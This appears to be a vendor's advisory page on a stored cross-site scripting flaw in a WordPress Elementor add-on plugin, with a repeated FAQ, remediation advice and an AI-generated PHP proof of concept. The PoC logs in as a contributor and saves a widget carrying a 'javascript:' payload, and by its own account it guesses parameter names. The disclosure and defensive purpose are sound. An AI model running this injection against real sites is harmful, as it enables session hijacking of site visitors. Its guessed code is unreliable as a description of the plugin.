What is CVE-2025-14274?

CVE-2025-14274 is a stored Cross-Site Scripting (XSS) vulnerability in the Unlimited Elements for Elementor plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject malicious scripts via the Border Hero widget’s Button Link field, which are then executed when other users view the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping on user-supplied URLs in the Button Link field. An attacker can input a malicious JavaScript payload, which is stored and executed when a user accesses the page containing the widget, potentially leading to session hijacking or unauthorized actions.

Who is affected by this vulnerability?

Any WordPress site using the Unlimited Elements for Elementor plugin version 2.0.1 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if the Unlimited Elements for Elementor plugin is installed and check its version. If the version is 2.0.1 or earlier, your site is at risk for this vulnerability.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 5.4, classified as Medium severity. This indicates that while the vulnerability requires authenticated access and user interaction to exploit, it still poses a significant risk to affected sites.

How can I fix or mitigate this issue?

To mitigate this issue, update the Unlimited Elements for Elementor plugin to version 2.0.2 or later, which includes a fix for this vulnerability. Additionally, review your site’s security practices to ensure proper input validation and output escaping are enforced.

What are the potential risks if this vulnerability is exploited?

If exploited, an attacker can execute arbitrary JavaScript in the context of users viewing the page, leading to session hijacking, unauthorized actions, or theft of sensitive data. The risk is elevated as Contributor-level users can create drafts that may be reviewed by higher-privileged users.

What does 'stored XSS' mean?

Stored XSS refers to a type of vulnerability where malicious scripts are stored on the server (in this case, within the post metadata) and executed when a user accesses the affected page. This is in contrast to reflected XSS, where the script is executed immediately without being stored.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated user can use the Elementor editor to inject a malicious payload into the Button Link field. It simulates the process of logging in and saving a post with the exploit, demonstrating the vulnerability’s practical implications.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Unlimited Elements for Elementor plugin temporarily to prevent exploitation. Additionally, review user permissions and restrict access to Contributor-level users until the plugin is updated.

What is the role of input sanitization in this context?

Input sanitization is crucial in preventing vulnerabilities like XSS by ensuring that user-supplied data is properly validated and cleaned before being processed or displayed. In this case, the lack of proper sanitization allowed attackers to inject harmful scripts.

What are the best practices to prevent similar vulnerabilities?

To prevent similar vulnerabilities, always keep plugins and themes updated, implement strict user role management, and employ security plugins that offer additional layers of protection. Regularly audit your site’s code and configurations for potential security weaknesses.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14274: Unlimited Elements for Elementor <= 2.0.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Border Hero Widget (unlimited-elements-for-elementor)

CVE ID CVE-2025-14274

Plugin unlimited-elements-for-elementor

Severity Medium (CVSS 5.4)

CWE 79

Vulnerable Version 2.0.1

Patched Version —

Disclosed February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14274 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Unlimited Elements for Elementor WordPress plugin, affecting versions up to and including 2.0.1. The vulnerability resides in the Border Hero widget’s Button Link field. An attacker with Contributor-level privileges or higher can inject malicious JavaScript payloads that are stored and executed when a user views the compromised page. The CVSS score of 5.4 (Medium) reflects the requirement for user interaction and authenticated access.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping on user-supplied URLs. The CWE-79 classification confirms a failure to neutralize user input before it is placed in web page output. The vulnerability description explicitly states the issue is in the Border Hero widget’s Button Link field. Without access to source code, Atomic Edge infers that the plugin likely accepts URL input via an Elementor widget control, passes it through inadequate or missing `sanitize_url()` or `esc_url()` functions, and then outputs it without proper escaping via `esc_attr()` or `esc_url()` in the frontend render function.

The exploitation method requires an authenticated attacker with at least Contributor-level permissions. The attacker would edit or create a post or page using the Elementor page builder. They would add the vulnerable Border Hero widget to the layout. Within the widget’s settings panel, the attacker would inject a JavaScript payload into the Button Link field. A typical payload would be `javascript:alert(document.domain)`. Upon saving the post, the malicious script is stored in the post’s metadata. The script executes in the browser of any user who views the page containing the compromised widget, including administrators.

Remediation requires proper input validation and output escaping. The patched version (2.0.2) likely implemented a combination of WordPress core sanitization functions. For the Button Link field, the fix should involve validating the input as a proper URL using `sanitize_url()` and then escaping it on output with `esc_url()`. If the field must accept non-URL protocols (like `mailto:`), a strict allowlist validation should be applied. The Elementor widget control definition should also specify a `Sanitizer` callback to filter input at the point of entry.

Successful exploitation leads to stored XSS attacks. The injected scripts execute within the context of the victim’s session. This can result in session hijacking, unauthorized actions performed on behalf of the victim (like changing passwords or creating new admin users), defacement of the site, or theft of sensitive data from the page. The impact is elevated because Contributor-level users, who typically cannot publish posts, can still create drafts reviewed by higher-privileged users, potentially compromising administrator accounts.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14274 - Unlimited Elements for Elementor <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Border Hero Widget
<?php
/**
 * Proof of Concept for CVE-2025-14274.
 * Assumptions based on metadata:
 * 1. Exploitation occurs via the Elementor editor interface.
 * 2. The attack vector is the 'Button Link' field in the 'Border Hero' widget.
 * 3. Contributor-level authentication is required.
 * This script simulates the attack by logging in and attempting to save a post with a malicious widget.
 * Note: Without the actual plugin code, this PoC uses educated guesses for parameter names and data structure.
 */

$target_url = 'http://vulnerable-wordpress-site.local';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload to inject into the Button Link field
$malicious_link = 'javascript:alert(`Atomic Edge XSS: `+document.domain)';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve_14274_cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_14274_cookie.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate as a Contributor
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Check for login success by looking for a dashboard redirect or absence of login form
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('[-] Authentication failed. Check credentials.');
}
echo '[+] Authentication successful.n';

// Step 2: Create a new post draft via the REST API to get a post ID and nonce
// Contributor users can create drafts via REST API (if permissions allow).
$api_url = $target_url . '/wp-json/wp/v2/posts';
$post_data = json_encode([
    'title' => 'Test Post - CVE-2025-14274',
    'status' => 'draft',
    'content' => 'Post content.'
]);
curl_setopt($ch, CURLOPT_URL, $api_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
$response = curl_exec($ch);
$post_info = json_decode($response, true);
if (!isset($post_info['id'])) {
    die('[-] Failed to create draft post via REST API.');
}
$post_id = $post_info['id'];
echo '[+] Created draft post ID: ' . $post_id . 'n';

// Step 3: Simulate saving the post with Elementor containing the malicious widget.
// This step is highly speculative without the exact Elementor save structure.
// A real attack would use the Elementor editor AJAX endpoint.
$elementor_save_url = $target_url . '/wp-admin/admin-ajax.php';
// Assumed AJAX action for saving Elementor data. This is a common pattern.
$save_fields = [
    'action' => 'elementor_ajax',
    'actions' => json_encode([
        'action' => 'save_builder',
        'data' => [
            'post_id' => $post_id,
            'data' => [
                'elements' => [
                    [
                        'id' => 'some_element_id',
                        'elType' => 'widget',
                        'settings' => [
                            // Assumed widget type and field name based on description
                            '__widgetType' => 'border-hero',
                            'button_link' => $malicious_link // Injected payload
                        ],
                        'widgetType' => 'border-hero'
                    ]
                ]
            ]
        ]
    ])
];
curl_setopt($ch, CURLOPT_URL, $elementor_save_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($save_fields));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);

if (strpos($response, 'success') !== false) {
    echo '[+] Payload injected successfully.n';
    echo '[+] Visit the draft post at: ' . $target_url . '/?p=' . $post_id . ' to trigger the XSS.n';
} else {
    echo '[-] Payload injection may have failed. AJAX structure might differ.n';
    echo '[-] Raw response: ' . $response . 'n';
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-14274?
Overview of the vulnerability
CVE-2025-14274 is a stored Cross-Site Scripting (XSS) vulnerability in the Unlimited Elements for Elementor plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject malicious scripts via the Border Hero widget’s Button Link field, which are then executed when other users view the affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping on user-supplied URLs in the Button Link field. An attacker can input a malicious JavaScript payload, which is stored and executed when a user accesses the page containing the widget, potentially leading to session hijacking or unauthorized actions.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Unlimited Elements for Elementor plugin version 2.0.1 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify if the Unlimited Elements for Elementor plugin is installed and check its version. If the version is 2.0.1 or earlier, your site is at risk for this vulnerability.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for this vulnerability is 5.4, classified as Medium severity. This indicates that while the vulnerability requires authenticated access and user interaction to exploit, it still poses a significant risk to affected sites.
How can I fix or mitigate this issue?
Recommended actions for remediation
To mitigate this issue, update the Unlimited Elements for Elementor plugin to version 2.0.2 or later, which includes a fix for this vulnerability. Additionally, review your site’s security practices to ensure proper input validation and output escaping are enforced.
What are the potential risks if this vulnerability is exploited?
Consequences of exploitation
If exploited, an attacker can execute arbitrary JavaScript in the context of users viewing the page, leading to session hijacking, unauthorized actions, or theft of sensitive data. The risk is elevated as Contributor-level users can create drafts that may be reviewed by higher-privileged users.
What does 'stored XSS' mean?
Definition of stored XSS
Stored XSS refers to a type of vulnerability where malicious scripts are stored on the server (in this case, within the post metadata) and executed when a user accesses the affected page. This is in contrast to reflected XSS, where the script is executed immediately without being stored.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept illustrates how an authenticated user can use the Elementor editor to inject a malicious payload into the Button Link field. It simulates the process of logging in and saving a post with the exploit, demonstrating the vulnerability’s practical implications.
What should I do if I cannot update the plugin immediately?
Interim measures for affected sites
If an immediate update is not possible, consider disabling the Unlimited Elements for Elementor plugin temporarily to prevent exploitation. Additionally, review user permissions and restrict access to Contributor-level users until the plugin is updated.
What is the role of input sanitization in this context?
Importance of sanitization
Input sanitization is crucial in preventing vulnerabilities like XSS by ensuring that user-supplied data is properly validated and cleaned before being processed or displayed. In this case, the lack of proper sanitization allowed attackers to inject harmful scripts.
What are the best practices to prevent similar vulnerabilities?
Preventative measures for WordPress security
To prevent similar vulnerabilities, always keep plugins and themes updated, implement strict user role management, and employ security plugins that offer additional layers of protection. Regularly audit your site’s code and configurations for potential security weaknesses.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations